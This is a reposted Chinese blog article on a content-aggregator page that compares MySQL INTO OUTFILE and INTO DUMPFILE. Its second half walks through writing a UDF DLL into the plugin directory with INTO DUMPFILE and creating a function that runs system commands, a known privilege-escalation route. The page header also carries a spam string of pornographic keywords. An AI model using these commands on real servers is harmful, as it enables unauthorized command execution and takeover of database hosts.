日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

mysql outfile 变量_转mysql dumpfile 与 outfile 函数的区别

發布時間:2023/12/4 数据库 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 mysql outfile 变量_转mysql dumpfile 与 outfile 函数的区别 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一直以為兩個函數作用是相同的 經過簡單測試發現還是有些區別的 如下表admin mysql select * from admin; +-----+-----------+---------+ | uid | name | pass | +----+------------+---------+ | 1 | admin | baidusb | | 2 | root | hacksb | | 3 | manage

一直以為兩個函數作用是相同的

經過簡單測試發現還是有些區別的

如下表admin

mysql> select * from admin;

+-----+-----------+---------+

| uid | name????? | pass??? |

+----+------------+---------+

|? 1 | admin????? | baidusb |

|? 2 | root????????? | hacksb? |

|? 3 | manage??? | nimei??? |

|? 4 | boss???????? | helensb |

|? 5 | guanli?????? | admin?? |

|? 6 | superuser? | G0Ood?? |

+----+------------+---------+

mysql> select * from admin into outfile '/home/seclab/test/test1.txt';

Query OK,1 row affected (0.00 sec)

我是想將這些內容 導出到 一個txt文件,事實上是可以完整導出每行記錄的.

這個很適合導庫

而into dump是不行的 它只能導出 一行數據!

若我們想把一個 可執行2進制 文件用into outfile函數導出

事實上 導出后 就會被破壞

因為into outfile 函數 會 在行末端寫入新行 更致命的 是會轉義 換行符

這樣的話這個2進制可執行 文件 就會被破壞

這時候我們用into dumpfile 就能導出 一個完整能執行的2進制 文件

into dumpfile 函數不對任何列或行進行終止,也不執行任何轉義處理

如在無web腳本 執行 但是有mysql root 執行的環境下 我們就可以 通過

into dump 函數導入udf.dll進行提權

mysql> show variable like '%plugin%';

+----------------+------------------------------------------+

|Variable_name?? | Value??????????????????????????????????? |

+----------------+------------------------------------------+

| plugin_dir???? |c:\mysql\mysql server 5.1\lib/plugin????? |

+----------------+------------------------------------------+

mysql> select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';

mysql> select * from func; #查看是否有人創建過udf 如果有就可以省略

mysql> create function MyCmd returns string soname ''c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';

mysql> select MyCmd('whoam');

一點小知識點:

如何獲取該udf.dll文件的16進制值(hex)?

我們可以本地搭建mysql環境 找個可以用的udf.dll文件 執行下面操作

mysql> select hex(load_file ('c://temp/xxoo.dll')) into outfile 'c:/windows/temp/xxoo.txt';

如何獲取該udf插件的內置 函數?

通過C32 等16進制 編輯器 或直接通過記事本 打開 看關鍵字 即可

摘自 http://hi.baidu.com/evilrapper/blog/item/5a36f290c9b54692a877a46a.html

總結

以上是生活随笔為你收集整理的mysql outfile 变量_转mysql dumpfile 与 outfile 函数的区别的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。